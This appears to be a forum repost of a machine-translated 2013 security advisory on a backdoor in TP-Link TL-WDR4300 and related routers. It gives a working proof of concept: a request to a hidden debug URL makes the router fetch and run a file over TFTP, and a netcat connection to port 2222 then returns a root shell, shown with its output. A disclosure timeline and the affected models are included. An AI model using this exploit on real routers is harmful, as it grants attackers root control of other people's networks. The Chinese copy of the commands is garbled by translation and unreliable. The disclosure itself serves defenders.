TP-Link的HTTP / TFTP后门 关于TP-LINK路由器 TP-Link的的TL-WDR4300是一种流行的双频段无线网络,SOHO级路由器。
测试固件我们测试的远程根的PoC最新的固件(发表于2012年12月25日):
 TL-WDR4300 - 测试的固件版本
以下信息仅作教育用途!我们也没有责任感,任何潜在的损害此漏洞测试的设备。
更新:在路由器的问题的更多信息可以在这里找到。
概念验证UPDATE2:WAN端口的作品,如果HTTP管理是开放的WAN
root@secu:~# nc 192.168.0.1 2222(UNKNOWN) [192.168.0.1] 2222 (?) : Connection refusedroot@secu:~# wget http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html --2013-03-09 23:22:31-- http://192.168.0.1/userRpmNatDebugRpm26525557/start_art .htmlConnecting to 192.168.0.1:80... connected.HTTP request sent, awaiting response... 200 OKLength: unspecified [text/html]Saving to: "start_art.html" [ <=> ] 426 --.-K/s in 0s2013-03-09 23:22:33 (49.1 MB/s) - "start_art.html" saved [426]root@secu:~# nc 192.168.0.1 2222ps PID Uid VmSize Stat Command 1 root 404 S init 2 root SW< [kthreadd] 3 root SW< [ksoftirqd/0] 4 root SW< [events/0] 5 root SW< [khelper] 6 root SW< [async/mgr] 7 root SW< [kblockd/0] 8 root SW [pdflush] 9 root SW [pdflush] 10 root SW< [kswapd0] 17 root SW< [mtdblockd] 18 root SW< [unlzma/0] 71 root 2768 S /usr/bin/httpd 76 root 380 S /sbin/getty ttyS0 115200 78 root 208 S ipcserver 82 root 2768 S /usr/bin/httpd 83 root 2768 S /usr/bin/httpd 86 root 732 S ushare -d -x -f /tmp/ushare.conf 92 root 348 S syslogd -C -l 7 96 root 292 S klogd 101 root SW< [napt_ct_scan] 246 root 348 S /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p /tmp/wr841n/u 247 root 204 S /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p /tmp/wr841n/u 251 root 364 S /usr/sbin/udhcpd /tmp/wr841n/udhcpd.conf 286 root 2768 S /usr/bin/httpd 299 root 2768 S /usr/bin/httpd 300 root 2768 S /usr/bin/httpd 305 root 2768 S /usr/bin/httpd 307 root 2768 S /usr/bin/httpd 309 root 2768 S /usr/bin/httpd 310 root 2768 S /usr/bin/httpd 389 root 2768 S /usr/bin/httpd
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
| 根@ SECU:〜#NC 192.168.0.1 2222
(UNKNOWN)[192.168.0.1] 2222(?):连接被拒绝
根SECU:〜#wget的http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html - 2013年3月9日23时22分31秒 - http://192.168.0.1/userRpmNatDebugRpm26525557/start_art。HTML
连接到192.168.0.1:80 ... 连接。
已发出HTTP请求,正在等待回应... 200 OK
长度:未指定[text / html类型]
保存到“start_art.html”
[<=>] 426 - 。-K / S 0
2013年3月9日二十三时22分33秒(49.1 MB / s)的 - “start_art.html·”的保存[426]
根@ SECU:〜#NC 192.168.0.1 2222
PS
PID UID VmSize统计命令
1根404的init
2根SW <[kthreadd]
3根SW <[ksoftirqd / 0]
4根SW <[事件/ 0]
5根SW <[khelper]
6根SW <[异步/经理]
7根SW <[kblockd / 0]
8根SW [pdflush]
9根SW [pdflush]
10根SW <[kswapd0]
17根SW <[mtdblockd]
18根SW <[unlzma / 0]
71根2768 S / usr / bin中/ httpd的
76根380 S / sbin目录/盖蒂的ttyS0 115200
78根208 S ipcserver
82根2768 S / usr / bin中/ httpd的
83根2768 S / usr / bin中/ httpd的
86根732小号ushare-D-X-F / tmp / ushare.conf中
92根348小号的syslogd-C-L 7
96根292小号与klogd
101根SW <[napt_ct_scan]
246根348 S / sbin目录/ udhcpc的TL-WDR4300 H-我eth0.2-P / tmp/wr841n/u
247根204 S / sbin目录/ udhcpc的TL-WDR4300 H-我eth0.2-P / tmp/wr841n/u
251根364 S / usr / sbin目录/ udhcpd的/ tmp/wr841n/udhcpd.conf的的
286根2768 S / usr / bin中/ httpd的
299根2768 S / usr / bin中/ httpd的
300根2768 S / usr / bin中/ httpd的
305根2768 S / usr / bin中/ httpd的
307根2768 S / usr / bin中/ httpd的
309根2768 S / usr / bin中/ httpd的
310根2768 S / usr / bin中/ httpd的
389根2768 S / usr / bin中/ httpd的
|
详细信息在下面的HTTP请求被发送:
http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html
的路由器下载一个的文件(nart.out),从主机,issed的http请求并执行的根: POC - 图
样品捕获从主机发出的HTTP请求:
 Wireshark的过滤器用来显示路由器的TFTP流量
 nart.out TFTP请求
模型的影响- TL-WDR4300
- TL-WR743ND(V1.2 V2.0)
- ...
历史的错误2013年2月12日-通过电子邮件发送TP-Link的细节-没有响应
2013年2月22日- TP-Link的细节通过电子邮件发送-没有响应
2013年3月12日-
2013年3月14日公开披露-更新:从波兰TP-Link的接触。他们问一些更详细的信息。其他的PoC发送
2013年3月15日- UDPATE:问题的确认(这是WAN可利用的,如果HTTP管理是来自WAN端)。
更多信息http://sekurak.pl/more-information-about-tp-link-backdoor/
- 米哈尔Sajdak <michal.sajdak[at]securitum.pl>
最新的信息
最近的评论
©2013年Sekurak Corporation版权所有
| 
楼主: ghostja
| 江苏省互联网有害信息举报中心 举报信箱:js12377 | @jischina.com.cn 举报电话:025-88802724
本站不良内容举报信箱:68610888@qq.com
简体中文
繁體中文
English
日本語
Deutsch
한국 사람
بالعربية
TÜRKÇE
português
คนไทย
IP卡
狗仔卡
发表于 2013-3-19 11:02
显身卡
这都要隐藏啊……
发表于 2013-3-19 14:17
